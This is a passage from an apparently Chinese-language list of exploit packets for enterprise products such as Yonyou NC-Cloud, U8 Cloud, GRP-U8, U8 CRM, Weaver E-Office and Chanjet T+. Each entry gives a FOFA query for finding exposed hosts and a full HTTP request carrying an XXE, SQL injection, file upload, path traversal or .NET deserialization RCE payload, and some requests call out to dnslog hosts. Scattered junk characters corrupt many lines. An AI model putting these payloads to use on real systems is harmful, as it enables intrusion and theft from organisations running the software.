$ _; d- X- V# \: |6 y) u' PAccept-Encoding: gzip, deflate) W$ B8 K0 C9 ?
Accept: */*3 @; P) E6 p3 _, I! A) X
Connection: close
) I' L; R6 C) v/ n( S3 m" N, d/ jaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
+ N6 W7 n! a# {7 V+ R! sContent-Length: 190
/ y5 ^8 t% y; B0 R% ?/ }9 fContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0$ b9 ^4 D& t6 V+ o* ^! u
7 J6 e- H" f5 ?+ ?0 g% g--fd28cb44e829ed1c197ec3bc71748df08 m. a" u: P- }' X7 i( y
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
; Q7 z. b' } q3 E/ Z' j, u5 o5 e: i9 R6 I
<%out.println(1111*1111);%>4 c) z0 m- `4 x! V
--fd28cb44e829ed1c197ec3bc71748df0--
{- k' c8 x& ] } r
% F4 B/ f# k9 P% R, ^
8 [2 a6 F3 q4 f0 X5 Q36. 用友NC-Cloud soapFormat XXE# u+ B' m4 e$ V: I
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"( |5 P* t4 q, G
POST /uapws/soapFormat.ajax HTTP/1.15 F d1 [- W' N/ f5 d
Host: 192.168.40.130:8989
2 a; q$ g& p: U! M9 j, hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
C# J' z, A) v, u- o S3 {( _Content-Length: 263$ P/ U4 K$ {7 z) J( q( j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 A5 Y) V- |; F2 `
Accept-Encoding: gzip, deflate
w) x5 y1 Q% _% | sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 p. z; L3 C! J! J7 F5 V2 [Connection: close
' _0 [0 T M# RContent-Type: application/x-www-form-urlencoded7 S$ n+ T0 M) L1 F4 Z2 l
Upgrade-Insecure-Requests: 1: _+ t4 n% J! V9 [, o
0 T3 s/ f) ?- o8 E
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
/ I8 ]! B7 p9 |8 \; m! Z* b3 U7 q7 p/ u" e& i! }# E
$ s' c$ X; a& u( I4 F3 V
37. 用友NC-Cloud IUpdateService XXE
' O5 D! V3 U% S2 lFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"% X F- \' x1 I
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
/ v2 z' ]3 a- zHost: 192.168.40.130:89898 r! U+ W: L: q; H* ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36) R+ v. Q1 s U; }, T- ?; }
Content-Length: 421# w7 d2 W9 u# N$ G2 }$ _& w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9. t. X9 E+ {) A% C X8 o' v- ^" m
Accept-Encoding: gzip, deflate8 Q8 f8 Q( X, ]: L$ B3 J2 Y0 h
Accept-Language: zh-CN,zh;q=0.9* K4 y8 t" |, r6 ~+ g% z- j t
Connection: close
/ ?; {& e- v( r. a% r* p( w dContent-Type: text/xml;charset=UTF-8
: Q4 ?) b% H& C8 E# GSOAPAction: urn:getResult
$ |5 U% g4 j* i8 d0 sUpgrade-Insecure-Requests: 1
& z6 O7 `$ j( W& w0 ` l$ p$ {( R3 f8 v
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">8 [: m) Q' V- a; b) H, N; @# E
<soapenv:Header/>; `3 u6 B( R: R4 Y, V3 j& z
<soapenv:Body>
: o) r9 U% {+ ^* ^. g! Z<iup:getResult>
4 D2 I: ?1 S* U" _2 B) L<!--type: string-->
# u4 k3 u/ A+ I. [, B' H<iup:string><![CDATA[# O& r8 i# q# `! B$ c) ~" Q9 n5 f
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
1 K" P; P J% I2 K0 n5 ~4 `<xxx/>]]></iup:string>
0 X. ? ?1 D1 N. [6 x</iup:getResult>
1 o. W, g m6 e9 y$ f- a2 Y0 C% d</soapenv:Body>: ~; h. w; \8 o0 A4 b+ T; R
</soapenv:Envelope>- |; y( c9 i6 T
9 y: {7 n* I3 V1 j
( U5 G& {' ]+ Y: r5 n. L& ^" v* N4 ^% S# |3 F# I% {
38. 用友U8 Cloud smartweb2.RPC.d XXE
% J4 r/ | C' tFOFA:app="用友-U8-Cloud"& n/ k: z6 y( C" ^1 _& X9 Z7 S# B
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1! F: P6 O! u: ]/ V
Host: 192.168.40.131:8088& O9 N7 V/ ~% ~9 z. i: b$ A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25$ W% v b: r; O4 E
Content-Length: 260$ Z8 I# V9 D' f9 w) X/ k* g3 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
/ I4 `7 J& d1 jAccept-Encoding: gzip, deflate& Q) D& e& O; |. l4 q" j2 O* N
Accept-Language: zh-CN,zh;q=0.9
8 |( |4 B9 k$ H, @4 v% m2 g+ TConnection: close
" K% Q+ r/ Y9 w9 ?% U; dContent-Type: application/x-www-form-urlencoded
7 x( A# N! X6 B7 }# W9 a/ a2 B4 d, K( F7 {# n% g1 |: ?
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
/ X; e3 L6 N, p1 I$ f
: U2 X0 _9 v) P
0 n3 W6 q" i) S39. 用友U8 Cloud RegisterServlet SQL注入
) Q& I6 t2 N. y; e3 V% E: F- c2 kFOFA:title="u8c"& R4 q6 N5 k- e, O5 x
POST /servlet/RegisterServlet HTTP/1.1+ h4 u0 x8 [7 I' q+ {$ q7 t, x
Host: 192.168.86.128:8089
$ _) S, m$ N$ p N4 Q; KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
: V6 p6 B2 P W: cConnection: close
3 `8 L) _ a) R" H. |0 v& p1 P& p: O1 JContent-Length: 85
- P1 m4 Q6 H2 u9 M" {3 r) r2 JAccept: */*! R) [* S' x% }: |' F
Accept-Language: en
( S" r& Q% M2 ^+ J4 j! `Content-Type: application/x-www-form-urlencoded' v4 _; u, M( f. T
X-Forwarded-For: 127.0.0.1" Y+ K5 m: u7 i# u. p
Accept-Encoding: gzip4 Z( `/ {$ R) c3 \0 c
/ m9 y+ t, H+ eusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
' P+ Q5 O8 o1 ]6 y9 |8 x, _2 X r, w4 c9 K2 p3 _- ?2 H. X
7 I+ }. f: r/ U7 m40. 用友U8-Cloud XChangeServlet XXE
6 s- w, O1 b0 d) M. h, A7 GFOFA:app="用友-U8-Cloud"0 p+ y: h# B# T' a% x
POST /service/XChangeServlet HTTP/1.1
' R( h! f" A- Z* ]1 O; |+ q8 a9 HHost: x.x.x.x
# a' T5 J1 v/ ZUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36. x1 A8 `0 A& f0 W) d' }
Content-Type: text/xml; W \. u! i' i; s# F: q$ P
Connection: close0 R, H( Q% |; N
% }" v7 B6 ^' Z* g4 ?
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
% W# I5 T0 q2 G2 T- n$ c' K. j4 U9 f! k/ }
4 C+ ~, f) Q1 E7 }
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入) @" C, s9 a$ t/ _: `* e& M' q( ~
FOFA:app="用友-U8-Cloud"
8 l+ |9 Z* |! a5 R" @GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1+ S; I; F& i, Z' w
Host:
8 {: s0 f7 l0 Q6 A' w0 _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( v* X" `) ? P1 y3 @8 M& f
Content-Type: application/json
! O) I! Z7 u) s* s3 o- HAccept-Encoding: gzip
' t: C: x$ W6 j, B; LConnection: close7 e# ?% T. g% W/ G
; X |2 X m7 C3 `3 A3 _, `
1 \5 \$ l+ `1 K1 o; S. N: J. T9 F
42. 用友GRP-U8 SmartUpload01 文件上传
% {! k% `" o# j( s, e# _- O- {! kFOFA:app="用友-GRP-U8"
3 U9 e$ E3 n1 e! U( U9 b" m& zPOST /u8qx/SmartUpload01.jsp HTTP/1.1
" m" O! t h# ~Host: x.x.x.x& K+ ]9 p6 k9 P3 u& E$ t+ ]4 v Z" L
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt/ ~/ J [1 z0 B! w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36/ q! \. r+ U3 a" X4 w9 F3 j
' y- L9 O! l; R- N, ?PAYLOAD g/ v6 M7 q& }, I( Z5 g. i
# y9 y6 Q. Q& z4 I- C
" S6 o) G( B1 E' _
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
3 S& R$ c- O; E5 S3 q( q3 A
' L; E6 V& i! w1 A; t43. 用友GRP-U8 userInfoWeb SQL注入致RCE
/ M: |& T7 ~# ?$ x! F( VFOFA:app="用友-GRP-U8"& U4 ]+ P, U8 b3 L
POST /services/userInfoWeb HTTP/1.1
3 G% B1 t+ X. }) e4 Y+ xHost: your-ip4 g, X$ `0 D5 ^" \6 ?. M: S6 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
- @5 E* e" X2 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- W2 |) H6 {4 {4 V0 d. U
Accept-Encoding: gzip, deflate/ V' r# K3 q: Z4 V& h7 m+ ^+ u( z
Accept-Language: zh-CN,zh;q=0.93 N8 _; H1 X5 S' n( G' L1 I
Connection: close
& e0 g1 a$ G* D. I' e; hSOAPAction:
& Z& N# N2 H \9 ?/ G6 b' U( o* ^Content-Type: text/xml;charset=UTF-8
' K* W' @0 R$ I3 v/ i j+ Q- @6 \
1 i9 x/ L1 G' I<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">' g: N# E5 }, l% w! ^/ ?7 B
<soapenv:Header/>
1 p4 ]( k6 N: v& o1 C; X$ H8 h <soapenv:Body>
; I7 J% w6 f' B: ? <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+ V6 h7 ], j. u$ P0 h2 P3 y <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
$ w$ K6 P" e3 N/ _ </ser:getUserNameById>( p1 _# A9 L+ b- Y- q) R, w
</soapenv:Body>
' o7 Z( i- Z/ ~1 X- z. N# V</soapenv:Envelope>
! V7 @# J: d& |& M# k- i7 }; M& a1 }
; l0 n: ^( G$ Y* j2 x
44. 用友GRP-U8 bx_dj_check.jsp SQL注入3 P5 g; i' u# L: ?, L
FOFA:app="用友-GRP-U8"
# c- w; H+ r1 r: f9 v8 T/ KGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
0 S I! t) V2 _ b1 }% YHost: your-ip
& M4 U9 c0 h9 V/ t3 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.360 ?! h' s" H3 J( I' G1 I+ n/ Z& G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 t6 k6 _! X4 N
Accept-Encoding: gzip, deflate
; B* g( }9 I5 n! b- C9 IAccept-Language: zh-CN,zh;q=0.99 C7 _3 d; N! m R6 l* D
Connection: close4 h8 G1 K; t& @9 G9 N: ?# y* y
/ _" T1 p, y( C4 B( @! K4 H+ ~8 |
4 p% b5 s" u% z. {, e
45. 用友GRP-U8 ufgovbank XXE# m" ^% K0 k( g( l1 k8 a+ Z7 P E
FOFA:app="用友-GRP-U8"2 `& L" S1 X+ C; Y$ Y2 ~" V- h. D' f
POST /ufgovbank HTTP/1.1, J9 Q2 G6 k" Y1 s0 g, Y, ~! p
Host: 192.168.40.130:222
3 g! p9 B3 V/ o* u" L% ?. n! C- n' |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
; [5 P, m4 P# K0 YConnection: close4 C1 _. P; W0 h. f r
Content-Length: 161: I3 j8 \- ^8 q# E1 a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( O2 |9 u: z4 ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ ]' \ `- k5 P8 ?* V& Q# W3 _4 n
Content-Type: application/x-www-form-urlencoded
5 E2 n0 b; s; C. ]Accept-Encoding: gzip+ y) K8 b, s) h7 t
/ L/ b4 b! n. r: N" B! P, ]0 M/ w' g
reqData=<?xml version="1.0"?>
8 U# P7 G; f! u4 k! `5 |<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest- N9 ?. o* ^. | K1 A( P+ d2 q+ s
+ \# D4 ^& W0 @, L, m1 s6 I7 U4 Q& ?/ m3 I
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
$ T O. O/ N* Y" c S- FFOFA:app="用友-GRP-U8"
: D g' r9 V' T$ e/ f) H4 VGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
+ I: f. O' ^8 g$ x- yHost: your-ip5 e7 `9 g+ E: }7 H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36! k7 A8 C- k* }+ j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' ?; o# f) ]6 w7 Z5 k* j) w) A2 g+ d
Accept-Encoding: gzip, deflate
# a3 Z I0 V D7 [4 e+ [% o" NAccept-Language: zh-CN,zh;q=0.9
. ?8 a9 Q# |6 G. rConnection: close
3 y# O( ^( X2 ^# m ^- [4 y. B1 L/ @9 Q8 r7 w' P$ C7 B. _$ G7 \
3 M, g8 y3 y( q4 V& u$ M9 _$ a
47. 用友GRP A++Cloud 政府财务云 任意文件读取+ e# }3 d6 o4 F9 L" ^# i" |+ ~" B
FOFA:body="/pf/portal/login/css/fonts/style.css"% R" @5 E0 L0 h+ @- ?
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.15 d6 B8 L3 i: S
Host: x.x.x.x( Y( N; F# Q0 S9 j* D& i- U
Cache-Control: max-age=07 ]1 Z8 |% x1 Z. ^: }/ ^
Upgrade-Insecure-Requests: 1+ X1 l. ~ u6 C' C% x7 S7 C9 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
* N' ]- {% c H/ v, Z6 d. x+ tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 w' f, k" L2 M0 @) i" VAccept-Encoding: gzip, deflate, br$ H$ {" k/ T. c. o0 B' K* F5 o
Accept-Language: zh-CN,zh;q=0.9
5 _3 X5 Z/ \4 h6 KIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
* d) x5 t+ u: [$ B6 ]Connection: close8 w# t& u0 U0 ^8 {; P" Z J1 j9 a
' ?2 t: p7 J z, P3 U5 ] n" I6 W% _3 o
$ C- w3 F9 E4 @5 w3 z p48. 用友U8 CRM swfupload 任意文件上传
- S- E3 k- _' k/ zFOFA:title="用友U8CRM"5 v; G5 }2 D, X
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
7 ]3 h8 m* W+ N. J' vHost: your-ip
' {% l4 P& a/ N+ S$ P" nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
$ W; [; e1 d5 Z0 aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% r, g; L2 q" @# z; Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, ^0 z5 v4 s, w6 ^
Accept-Encoding: gzip, deflate
: a v# i, X3 H8 z" U3 w: D: {Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
8 }' ?% r0 S& J$ q) T- S/ U------269520967239406871642430066855
& B# B% Z% k u! `% f. u1 {Content-Disposition: form-data; name="file"; filename="s.php"9 ? L0 Q' a1 b/ |; \) c z1 |- }' z
1231
$ _$ l. @6 G0 nContent-Type: application/octet-stream e) ]- m; L9 B5 Z3 @
------269520967239406871642430066855
K9 U$ K6 k3 k0 l; wContent-Disposition: form-data; name="upload"3 I' _% c7 \9 P8 j8 R$ }& R. w
upload6 G3 H1 A3 S6 `/ \) @
------269520967239406871642430066855--3 T1 j' J; t) m
, \* e) Y+ _8 e3 f* t7 f2 t/ J! E! n" R5 H
49. 用友U8 CRM系统uploadfile.php接口任意文件上传! z9 i* x( r, E6 M* B/ g
FOFA:body="用友U8CRM"4 _" k3 @8 ]) m8 H- T; E
1 p' L7 l9 W& E
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.12 I5 U0 h+ b" I0 h e4 ~$ I' h
Host: x.x.x.x
4 x+ |' _1 {% C1 z& o+ b7 d* j( fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
" s! H+ W) X& K2 P1 jContent-Length: 329
- d) x/ S8 \7 v2 f( B: i+ YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% y: J; y& b3 B: FAccept-Encoding: gzip, deflate- Q/ f* q* O/ [6 b0 s3 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ E2 ^, J; C+ n0 a" t, h
Connection: close
: U G$ n( h( C. l: d gContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
1 }* p- c# y3 F% P; u) ^' B/ x u' N8 u8 m( F
-----------------------------vvv3wdayqv3yppdxvn3w
' p1 V8 E0 {4 r$ |6 n- @Content-Disposition: form-data; name="file"; filename="%s.php "3 P! f8 i- @0 y4 o5 n
Content-Type: application/octet-stream7 b: u x" ?$ I) M9 D: G
3 h' Z0 k2 W7 {; n) |. f
wersqqmlumloqa
& Q6 c$ q( a# b- j-----------------------------vvv3wdayqv3yppdxvn3w% `8 Q" ] d- ^
Content-Disposition: form-data; name="upload"$ s4 D$ t7 s: f- d/ H# D
- w8 r& u3 V3 Z ?. y/ Yupload6 }: l7 d: }5 c7 c- @
-----------------------------vvv3wdayqv3yppdxvn3w--
- C3 u# k k* L$ Z9 G3 v' J3 X. W8 \# _3 g" F
& i6 S- O1 G3 X% f8 [& Y' Khttp://x.x.x.x/tmpfile/updB3CB.tmp.php @, B9 _; @) r: X
% O% s# X# T) Y" q
50. QDocs Smart School 6.4.1 filterRecords SQL注入! o4 T. Z6 u% y! c% N& Q! j
FOFA:body="close closebtnmodal"' W# T* \) O1 D6 _
POST /course/filterRecords/ HTTP/1.1
5 l9 r* G, r. u/ j! ]Host: x.x.x.x
5 u# J8 a4 [* b# g8 B; t, L! hUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
& J7 P9 t! a0 B) S* |. lConnection: close# S4 }6 C. g- c0 w5 k
Content-Length: 224
7 {, l' J& K2 b2 M0 TAccept: */*. O2 r+ c" \/ Q, e" }% T( M6 `
Accept-Language: en _6 W5 T! \# |0 I- O1 Q
Content-Type: application/x-www-form-urlencoded
( c" F( V: Y/ J9 |Accept-Encoding: gzip
6 Z1 ` g) y. j" m/ R, R) F) ^
$ u. F+ Z. i5 e$ k5 x$ y3 vsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
- Z; S- G* }8 E, ^8 }' N
" X5 Z4 U8 h; V; m/ {, w; _& o$ N; }5 W8 H
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
$ K1 ^5 F7 a1 v2 p( w p4 oFOFA:app="云时空社会化商业ERP系统"
' h q7 T# M o& b% U( fGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.10 O8 g: ~! P/ p3 u! ]+ s" d
Host: your-ip
' B5 H# k2 m5 c% O5 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
2 c1 h, j# ?2 X, _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
* ?; Z% R: S0 I% ]3 s( F. _Accept-Encoding: gzip, deflate
: y/ J- E7 b( a, h% t2 D/ m2 fAccept-Language: zh-CN,zh;q=0.9
2 Q9 h4 a e" q: A/ i( {2 zConnection: close
' K3 r, [5 H8 U# v8 B8 J
" d7 c/ ^4 e5 y/ ?/ w& l
0 z+ N% L3 S4 W/ R+ t52. 泛微E-Office json_common.php sql注入
1 ?5 m# b$ e& U- y6 r' p8 dFOFA:app="泛微-EOffice"
. _) Y' J$ m5 I9 U2 x$ |POST /building/json_common.php HTTP/1.18 I: F4 v' h# H& ~+ g. V
Host: 192.168.86.128:80972 Z9 C% L; }5 d
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) T* ]/ F( C( z8 | z+ yConnection: close
$ ?& R- {! s8 v9 ^$ }Content-Length: 87 \3 E9 B1 f. l5 L) t. D$ q5 j8 m
Accept: */*$ P+ i- ^7 E9 i6 e% B5 h
Accept-Language: en: C# ^$ F$ w8 j$ c( e) d* u" m
Content-Type: application/x-www-form-urlencoded4 t, `' Z: s5 m& i
Accept-Encoding: gzip: P @2 c3 \, j/ a# a/ C6 p
$ i! H: y! @: R% G7 i& ^. dtfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333, P* p- s! R5 t- z* I( E
6 ]6 L5 E7 ]0 }
& [8 {/ r. ?. y2 m( H, k8 s3 Y53. 迪普 DPTech VPN Service 任意文件上传
1 X" }4 \1 |0 v6 B1 S4 X3 ]- |3 DFOFA:app="DPtech-SSLVPN"
2 M; N1 B v& d3 R$ d; q/ h/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
% n1 j9 `1 Z- x$ x4 Y+ }$ `1 ~* a+ f+ ]& Z
/ A% D9 q" l! y, g, D- p54. 畅捷通T+ getstorewarehousebystore 远程代码执行
2 A( v0 Z- E) }& d" U+ jFOFA:app="畅捷通-TPlus"" k" @' ^5 ]$ ~1 a9 m/ ^5 Q1 y% M/ [
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
1 ], E5 w5 b2 i! N- _ c4 l"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"( B) i$ z$ ~# q0 B' z0 X) p0 l
8 Y! R2 Y/ C+ x+ y2 {+ I
0 ]1 c0 [/ H1 ~- k
完整数据包% r3 \+ f# M# k, T4 o
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
) V8 [! }% \7 L( ~Host: x.x.x.x
# Z1 r% c! ?& m! ~/ w3 gUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F8 Y; M" `5 f- g, [) r# {5 d# B
Content-Length: 593
4 g' W) R1 U8 m* t* @' i& H% S* e
7 |, d* G, c! o$ u' p. [3 D) }{5 I- C0 l: R& p5 o7 O2 r
"storeID":{
% T4 {4 q5 }, K/ K# B5 I- E1 E "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",$ q) p! c" u! p3 w2 A) |9 e" u
"MethodName":"Start",
# h9 n, X, a8 d, ~$ g( z7 r" } "ObjectInstance":{% Z9 H# Y% L1 ~3 d1 f
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",/ O! F; W* @# |/ |* J& b4 F6 d
"StartInfo":{8 i" d+ P o2 b$ s7 D. S
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
0 N" C+ `7 x7 t, [; S6 W2 M "FileName":"cmd",
7 p+ e/ [; L' e6 ~7 U "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"& r" z6 \$ `' N3 W- W* u: L& L
}
& s- \/ p, H5 F I, n7 A$ S }
$ v$ w% \( w+ f3 G o0 G, n }' X) r( o/ C/ x' S- I* g
}5 I3 U; w8 x/ j7 U3 P
) s% w' [8 l( Y$ N6 p9 v
! N7 J, U+ V% Z( W! ~
第二步,访问如下url
) O0 L( S" W$ W/ S$ n7 O/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
6 u# p5 u, ?$ c% |2 t ~0 e8 M$ Q2 n! {, e1 G. v
0 X% T i" p4 N# k1 X* M7 Y55. 畅捷通T+ getdecallusers信息泄露' x$ {5 T% f0 i; ]
FOFA:app="畅捷通-TPlus"
3 x& t. E. R, E8 m2 C# `" ^6 d第一步,通过1 h" v) M8 w' m0 \3 s" i. h
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
$ k* W% p6 |" {" ^' O+ N第二步,利用获取到的Cookie请求+ r5 ~; M; [0 e$ L+ }
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers$ c8 m( q$ Q" U% D9 p
- L+ g( M+ ?/ n& u0 a- i
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE$ K* ^- G0 v) I3 X) d) g
FOFA: app="畅捷通-TPlus"
" m ^* m: w7 V; Q7 FPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
/ Z( G& O* J+ ~$ l+ c% b, eHost: x.x.x.x
